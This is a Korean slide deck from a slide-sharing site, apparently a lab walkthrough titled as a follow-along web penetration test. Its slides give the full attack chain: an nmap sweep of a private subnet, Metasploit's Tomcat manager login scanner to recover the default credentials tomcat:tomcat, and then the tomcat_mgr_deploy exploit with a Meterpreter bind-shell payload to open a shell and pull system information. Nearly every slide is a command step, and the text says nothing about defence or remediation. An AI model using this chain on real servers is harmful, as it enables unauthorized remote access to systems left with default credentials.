Download presentation
Presentation is loading. Please wait.
1
모의해킹 따라하기 웹 해킹 김 지수
2
[ Putty ] ① Ifconfig =>현재 나의 IP확인 ② nmap –sSV 192.168.111.0/24
![[ Putty ] ① Ifconfig =>현재 나의 IP확인 ② nmap –sSV /24](http://slidesplayer.org/slide/16705284/97/images/2/%5B+Putty+%5D+%E2%91%A0+Ifconfig+%3D%3E%ED%98%84%EC%9E%AC+%EB%82%98%EC%9D%98+IP%ED%99%95%EC%9D%B8+%E2%91%A1+nmap+%E2%80%93sSV+%2F24.jpg "[ Putty ] ① Ifconfig =>현재 나의 IP확인 ② nmap –sSV /24")
3
[ :8180 ] ③ firefox & : 브라우저 실행 => IP주소 입력 홈페이지 접속 확인
![[ :8180 ] ③ firefox & : 브라우저 실행 => IP주소 입력 홈페이지 접속 확인](http://slidesplayer.org/slide/16705284/97/images/3/%5B+%3A8180+%5D+%E2%91%A2+firefox+%26+%3A+%EB%B8%8C%EB%9D%BC%EC%9A%B0%EC%A0%80+%EC%8B%A4%ED%96%89+%3D%3E+IP%EC%A3%BC%EC%86%8C+%EC%9E%85%EB%A0%A5+%ED%99%88%ED%8E%98%EC%9D%B4%EC%A7%80+%EC%A0%91%EC%86%8D+%ED%99%95%EC%9D%B8.jpg "[ :8180 ] ③ firefox & : 브라우저 실행 => IP주소 입력 홈페이지 접속 확인")
4
[ Terminal ] ④ msfconsole => 메타스플로잇 연결
msf > search tomcat => 연결 포트 확인
![[ Terminal ] ④ msfconsole => 메타스플로잇 연결](http://slidesplayer.org/slide/16705284/97/images/4/%5B+Terminal+%5D+%E2%91%A3+msfconsole+%3D%3E+%EB%A9%94%ED%83%80%EC%8A%A4%ED%94%8C%EB%A1%9C%EC%9E%87+%EC%97%B0%EA%B2%B0.jpg "msf > search tomcat => 연결 포트 확인.")
5
[ Terminal ] ⑤ msf > use (톰캣 연결 구문 복사)
= use auxiliary/scanner/http/tomcat_mgr_login ⑥ set RHOSTS => 나의 IP ⑥ set RPORT 8180 => 8180
![[ Terminal ] ⑤ msf > use (톰캣 연결 구문 복사)](http://slidesplayer.org/slide/16705284/97/images/5/%5B+Terminal+%5D+%E2%91%A4+msf+%3E+use+%28%ED%86%B0%EC%BA%A3+%EC%97%B0%EA%B2%B0+%EA%B5%AC%EB%AC%B8+%EB%B3%B5%EC%82%AC%29.jpg "= use auxiliary/scanner/http/tomcat_mgr_login. ⑥ set RHOSTS => 나의 IP. ⑥ set RPORT 8180 =>")
6
[ Terminal ] ⑦ exploit => 계정과 패스워드 확인
![[ Terminal ] ⑦ exploit => 계정과 패스워드 확인](http://slidesplayer.org/slide/16705284/97/images/6/%5B+Terminal+%5D+%E2%91%A6+exploit+%3D%3E+%EA%B3%84%EC%A0%95%EA%B3%BC+%ED%8C%A8%EC%8A%A4%EC%9B%8C%EB%93%9C+%ED%99%95%EC%9D%B8.jpg "[ Terminal ] ⑦ exploit => 계정과 패스워드 확인")
7
[ :8180 ] ⑧ 다시 브라우저 재 접속 Tomcat Manager 앞에서 확인했던 아이디 패스워드 입력 (tomcat : tomcat)
![[ :8180 ] ⑧ 다시 브라우저 재 접속 Tomcat Manager 앞에서 확인했던 아이디 패스워드 입력 (tomcat : tomcat)](http://slidesplayer.org/slide/16705284/97/images/7/%5B+%3A8180+%5D+%E2%91%A7+%EB%8B%A4%EC%8B%9C+%EB%B8%8C%EB%9D%BC%EC%9A%B0%EC%A0%80+%EC%9E%AC+%EC%A0%91%EC%86%8D+Tomcat+Manager+%EC%95%9E%EC%97%90%EC%84%9C+%ED%99%95%EC%9D%B8%ED%96%88%EB%8D%98+%EC%95%84%EC%9D%B4%EB%94%94+%ED%8C%A8%EC%8A%A4%EC%9B%8C%EB%93%9C+%EC%9E%85%EB%A0%A5+%28tomcat+%3A+tomcat%29.jpg "[ :8180 ] ⑧ 다시 브라우저 재 접속 Tomcat Manager 앞에서 확인했던 아이디 패스워드 입력 (tomcat : tomcat)")
8
[ Terminal ] ⑨ search tomcat exploit/multi/http/tomcat_mgr_deploy 구문 복사
![[ Terminal ] ⑨ search tomcat exploit/multi/http/tomcat_mgr_deploy 구문 복사](http://slidesplayer.org/slide/16705284/97/images/8/%5B+Terminal+%5D+%E2%91%A8+search+tomcat+exploit%2Fmulti%2Fhttp%2Ftomcat_mgr_deploy+%EA%B5%AC%EB%AC%B8+%EB%B3%B5%EC%82%AC.jpg "[ Terminal ] ⑨ search tomcat exploit/multi/http/tomcat_mgr_deploy 구문 복사")
9
[ Terminal ] ⑩ use (복사 구문 =) exploit/multi/http/tomcat_mgr_deploy ⑪ set PASSWORD tomcat => 패스워드를 tomcat으로 설정 ⑫ set USERNAME tomcat => username tomcat으로 설정 ⑬ set RHOST => IP주소 재 설정 ⑭ set RPORT 8180 => 포트 번호 재 설정
![[ Terminal ] ⑩ use (복사 구문 =) exploit/multi/http/tomcat_mgr_deploy. ⑪ set PASSWORD tomcat => 패스워드를 tomcat으로 설정.](http://slidesplayer.org/slide/16705284/97/images/9/%5B+Terminal+%5D+%E2%91%A9+use+%28%EB%B3%B5%EC%82%AC+%EA%B5%AC%EB%AC%B8+%3D%29+exploit%2Fmulti%2Fhttp%2Ftomcat_mgr_deploy.+%E2%91%AA+set+PASSWORD+tomcat+%3D%3E+%ED%8C%A8%EC%8A%A4%EC%9B%8C%EB%93%9C%EB%A5%BC+tomcat%EC%9C%BC%EB%A1%9C+%EC%84%A4%EC%A0%95..jpg "⑫ set USERNAME tomcat => username tomcat으로 설정. ⑬ set RHOST => IP주소 재 설정. ⑭ set RPORT 8180 => 포트 번호 재 설정.")
10
[ Terminal ] ⑮ set payload java/meterpreter/bind_tcp ⑯ exploit
![[ Terminal ] ⑮ set payload java/meterpreter/bind_tcp ⑯ exploit](http://slidesplayer.org/slide/16705284/97/images/10/%5B+Terminal+%5D+%E2%91%AE+set+payload+java%2Fmeterpreter%2Fbind_tcp+%E2%91%AF+exploit.jpg "[ Terminal ] ⑮ set payload java/meterpreter/bind_tcp ⑯ exploit")
11
[ Terminal ] ⑰ shell ⑱ ls ⑲ exit
![[ Terminal ] ⑰ shell ⑱ ls ⑲ exit](http://slidesplayer.org/slide/16705284/97/images/11/%5B+Terminal+%5D+%E2%91%B0+shell+%E2%91%B1+ls+%E2%91%B2+exit.jpg "[ Terminal ] ⑰ shell ⑱ ls ⑲ exit")
12
[ Terminal ] ⑰ shell ⑱ ls =>목록 확인 ⑲ exit
![[ Terminal ] ⑰ shell ⑱ ls =>목록 확인 ⑲ exit](http://slidesplayer.org/slide/16705284/97/images/12/%5B+Terminal+%5D+%E2%91%B0+shell+%E2%91%B1+ls+%3D%3E%EB%AA%A9%EB%A1%9D+%ED%99%95%EC%9D%B8+%E2%91%B2+exit.jpg "[ Terminal ] ⑰ shell ⑱ ls =>목록 확인 ⑲ exit")
13
[ Terminal ] ⑳ meterpreter > sysinfo =>상대방의 정보를 획득 확인
![[ Terminal ] ⑳ meterpreter > sysinfo =>상대방의 정보를 획득 확인](http://slidesplayer.org/slide/16705284/97/images/13/%5B+Terminal+%5D+%E2%91%B3+meterpreter+%3E+sysinfo+%3D%3E%EC%83%81%EB%8C%80%EB%B0%A9%EC%9D%98+%EC%A0%95%EB%B3%B4%EB%A5%BC+%ED%9A%8D%EB%93%9D+%ED%99%95%EC%9D%B8.jpg "[ Terminal ] ⑳ meterpreter > sysinfo =>상대방의 정보를 획득 확인")
14
감사합니다.
Similar presentations
![충북대 네트워크 보안 연구실 [ gmail.com ] 정보 보호 응용 11. 해킹기술 (3) 11. 해킹기술 (3) - hacking & security -](/40/11033340/big_thumb.jpg "충북대 네트워크 보안 연구실 [ gmail.com ] 정보 보호 응용 11. 해킹기술 (3) 11. 해킹기술 (3) - hacking & security ->")
